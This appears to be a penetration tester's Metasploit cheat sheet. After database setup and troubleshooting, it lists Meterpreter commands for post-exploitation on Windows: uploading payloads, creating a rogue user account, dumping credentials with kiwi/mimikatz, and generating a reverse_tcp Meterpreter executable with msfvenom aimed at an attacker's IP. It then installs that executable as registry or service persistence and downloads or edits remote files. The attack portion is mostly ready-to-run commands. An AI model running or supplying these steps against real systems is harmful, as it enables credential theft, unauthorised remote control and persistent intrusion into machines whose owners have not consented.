Setup the Database
service postgresql start
kali msfdb init
Test it:
msfconsole
db_status
You’ll know it worked if you see [*] postgresql connected to msf
.
Resource: https://docs.kali.org/general-use/starting-metasploit-framework-in-kali
Troubleshooting database connectivity issues
Start by restarting the postgres service:
service postgresql restart
If that doesn’t work, try destroying and recreating the database:
msfdb delete
msfdb init
Then test it:
msfconsole
db_status
Resource: https://stackoverflow.com/questions/32561760/metasploit-cant-use-default-msf3-to-connect
Meterpreter
Get current user info
getuid
View running jobs
Useful if you’re running something with exploit -j -z
jobs
Upload file
You could use this in conjunction with an Empire payload for example
upload /tmp/launcher.bat C:\\Users\\target_user\\Downloads
Create rogue user on a windows system
run getgui -u <user to create> -p <password to set>
Resource: https://www.coengoedegebure.com/hacking-windows-with-meterpreter/#anchor_createanewaccount
Mimikatz
To get started, run:
load kiwi
Show commands
help
Dump all creds:
creds_all
Run mimikatz command examples
mimikatz_command -f sekurlsa::searchPasswords
mimikatz_command -f sekurlsa::logonPasswords
mimikatz_command -f samdump::hashes
Interact with harvested credentials
List credentials
creds
Delete all smb credentials
creds -d -p 445
Persistence
Generate a malicious exe (note that the payload you choose may be different):
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attackers ip> LPORT=4444 -f exe -o /tmp/evil.exe
Run this in meterpreter:
run post/windows/manage/persistence_exe REXEPATH=/tmp/evil.exe REXENAME=default.exe STARTUP=USER LocalExePath=C:\\tmp
or background meterpreter and use the post module:
use post/windows/manage/persistence_exe
set REXEPATH /tmp/evil.exe
set SESSION <session number>
set STARTUP USER
set LocalExePath C:\\tmp
run
STARTUP
can be USER (registry key will be put into HKCU - HKEY_CURRENT_USER), SYSTEM (registry key will be put into HKLM - HKEY_LOCAL_MACHINE), or SERVICE (a rogue service will be created) which doesn’t seem to work very well.
Cleanup
The cleanup rc file does not work very well. As a result, you should take note of the registry key and associated file that are dropped for cleanup later, and make sure to note which user you’re running as. To remove the registry key (let’s say that USER was specified for the STARTUP
value and hFaZvOAsF
is the key), run the following command:
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ /v hFaZvOAsF /f
Run commands on local system
All you need to do is add an “l” before the command you want to run.
Current directory on system running msf
lpwd
Run ls
lls
Change directory
lcd <target dir>
Download remote file to current directory
download <filename>
The file will be in lpwd.
Channels
You can spawn a channel off of a session by hitting ctrl-z
.
List
channel -l
Interact
channel -i <id>
Destroy
channel -k <id>
Edit remote file
edit /path/to/file
Start in quiet mode
msfconsole -q
Resource: https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf
Show advanced module options
show advanced